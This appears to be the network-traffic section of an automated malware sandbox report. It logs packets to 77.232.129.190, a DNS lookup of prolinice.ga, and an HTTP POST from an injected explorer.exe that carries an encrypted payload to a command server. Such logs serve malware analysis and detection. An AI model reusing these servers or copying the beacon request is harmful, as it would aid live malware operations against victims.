                      May 28, 2024 08:24:00.495606899 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495625019 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495659113 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495670080 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495692015 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495724916 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495738983 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495760918 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495794058 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495810986 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495826960 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495861053 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495876074 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495897055 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495940924 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.554862976 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.554934978 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.554971933 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.554986954 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.555007935 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555043936 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555062056 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.555079937 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555115938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555133104 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.555150032 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555190086 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.555206060 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578103065 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578167915 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578176022 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578229904 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578273058 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578283072 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578316927 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578351021 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578366995 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578386068 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578428030 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578442097 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578474998 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578521013 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578531027 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578566074 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578599930 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578610897 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578671932 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578705072 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578721046 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.578742027 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578772068 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.578787088 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610141993 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610162020 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610173941 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610213041 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610244989 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610260963 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610274076 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610296011 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610306025 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610317945 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610330105 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610330105 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610342026 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610372066 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610380888 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610420942 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610456944 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.610857010 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610867023 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610877991 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610884905 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610893965 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.610917091 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611037016 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611089945 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611102104 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611119032 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611139059 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611150980 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611150980 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611190081 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611346006 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611419916 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611429930 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611465931 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611471891 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611484051 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611721992 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611733913 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611735106 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611768007 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611778975 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.611780882 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611828089 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.611989975 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612020969 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612031937 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612061024 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612081051 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612092972 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612102985 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612117052 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612149000 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612303972 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612329006 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612339020 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612348080 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612364054 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612377882 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612523079 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612533092 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612576962 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612651110 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612660885 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612688065 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.612798929 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612848997 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612859964 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.612893105 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613008022 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613018036 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613050938 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613089085 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613099098 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613130093 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613174915 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613184929 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613218069 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613261938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613271952 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613360882 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613483906 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613514900 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613523960 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613528013 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613578081 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613671064 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613691092 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.613728046 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.613980055 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614027023 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614058971 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614115953 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614137888 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614152908 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614176035 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614204884 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614214897 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614223957 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614237070 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614243984 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614264011 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614352942 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614363909 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614396095 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614520073 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614528894 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614598036 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614620924 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614639997 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614661932 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614691019 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614701033 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614764929 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.614934921 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.614980936 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615000963 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615025043 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615060091 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615459919 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615494967 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615504980 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615535975 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615557909 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615567923 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615578890 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615588903 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615592957 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615617990 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615634918 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615645885 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615658045 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615669012 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615670919 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615696907 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615864038 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615900993 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.615932941 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615946054 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.615979910 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616091013 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616115093 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616125107 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616134882 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616154909 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616173029 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616348028 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616358995 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616370916 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616383076 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616393089 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616429090 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616578102 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616591930 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616622925 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616624117 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616632938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616662025 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616861105 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616919994 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616929054 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616945982 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.616955996 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.616981983 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.617047071 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.617058992 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.617069960 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.617105007 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.617192030 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.617202044 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.617238045 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.617309093 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617320061 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617345095 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.617502928 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617552996 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617563963 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617573977 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617618084 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.617667913 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617703915 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.617722988 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617789984 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617799044 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.617822886 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.645638943 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645714045 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645714998 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.645745993 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645781994 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645795107 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.645838976 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645874023 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645893097 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.645911932 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645946026 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.645962000 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.645981073 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646013021 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646028996 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.646054029 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646101952 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.646147966 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646183968 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646219969 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.646229982 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.668684959 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.668703079 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.668715000 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.668723106 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.668729067 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.668827057 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.668859005 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.669152021 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.674016953 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.206712961 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:02.211709976 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.211801052 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:02.212639093 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:02.212672949 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:02.217624903 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.217722893 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.217735052 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.217746973 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:02.217761993 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:03.177079916 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:03.177145004 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:03.177205086 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:03.177679062 CEST | 49737 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:03.182637930 CEST | 80 | 49737 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:17.374567986 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:17.381942034 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:17.382019997 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:17.382160902 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:17.382191896 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:17.386960030 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:17.387093067 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.345221043 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.345359087 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.345408916 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.396975994 CEST | 49746 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.401787996 CEST | 80 | 49746 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.646105051 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.651040077 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.651103020 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.651241064 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.651268005 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:18.656337023 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:18.656455994 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:19.604626894 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:19.604789972 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:19.604809999 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:19.604953051 CEST | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:19.609683990 CEST | 80 | 49747 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:40.378094912 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:40.383552074 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:40.383635998 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:40.383744001 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:40.383760929 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:40.388658047 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:40.388712883 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:41.411209106 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:41.411328077 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:25:41.411382914 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:41.412235975 CEST | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:25:41.416240931 CEST | 80 | 49748 | 77.232.129.190 | 192.168.2.4
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      May 28, 2024 08:23:58.905642986 CEST | 50801 | 53 | 192.168.2.4 | 1.1.1.1
                      May 28, 2024 08:23:59.168926954 CEST | 53 | 50801 | 1.1.1.1 | 192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      May 28, 2024 08:23:58.905642986 CEST | 192.168.2.4 | 1.1.1.1 | 0x43d2 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      May 28, 2024 08:23:59.168926954 CEST | 1.1.1.1 | 192.168.2.4 | 0x43d2 | No error (0) | prolinice.ga |  | 77.232.129.190 | A (IP address) | IN (0x0001) | false
                      • ucwdyepiwprre.org
                        • prolinice.ga
                      • klhdddxmavj.net
                      • angnktfflahc.com
                      • wcxnjsqwwfpkqnc.net
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49736 | 77.232.129.190 | 80 | 2580 | C:\Windows\explorer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      May 28, 2024 08:23:59.175649881 CEST | 279 | OUT | POST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://ucwdyepiwprre.org/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 233
                      Host: prolinice.ga
                      May 28, 2024 08:23:59.175669909 CEST | 233 | OUT | Data Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 0c de 9f a3
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RY;PLi]Oh4og# $O6#N#<RNa~J9X\a*PZMD0>4}i1^&xUO7yZ(twOKp.+L~$
